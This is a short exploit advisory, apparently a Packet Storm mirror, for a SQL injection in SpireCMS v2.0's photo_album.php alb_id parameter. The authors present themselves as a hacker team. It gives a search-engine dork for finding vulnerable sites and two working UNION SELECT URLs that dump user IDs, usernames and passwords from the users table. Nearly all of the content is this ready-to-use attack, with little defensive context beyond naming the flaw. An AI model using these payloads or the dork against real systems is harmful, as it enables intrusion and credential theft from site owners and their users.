SpireCMS version 2.0 suffers from a remote SQL injection vulnerability.
5f58adff9ba22dcb41cda829f81e39b213bdf941e3dc4e45b449fbeed8227c63
view source
print?
ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************
[!] SpireCMS v2.0 SQL Injection Vulnerability
[!] Author : Dr.0rYX and Cr3w-DZ
[!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de
***************************************************************************/
[ Software Information ]
[+] Vendor : http://www.spiread.com/
[+] script : SpireCMS v2.0
[+] Download : http://www.spiread.com/demo/ (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"photo_album.php?alb_id="
**************************************************************************/
[ Vulnerable File ]
http://server/photo_album.php?alb_id=[N.A.S.T ]
[ Exploit ]
http://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password)+from+users
http://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password),null+from+users
[ GReets ]
[+] :claw , le0n , exploit-db.com , ALL HACKERS MUSLIMS
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed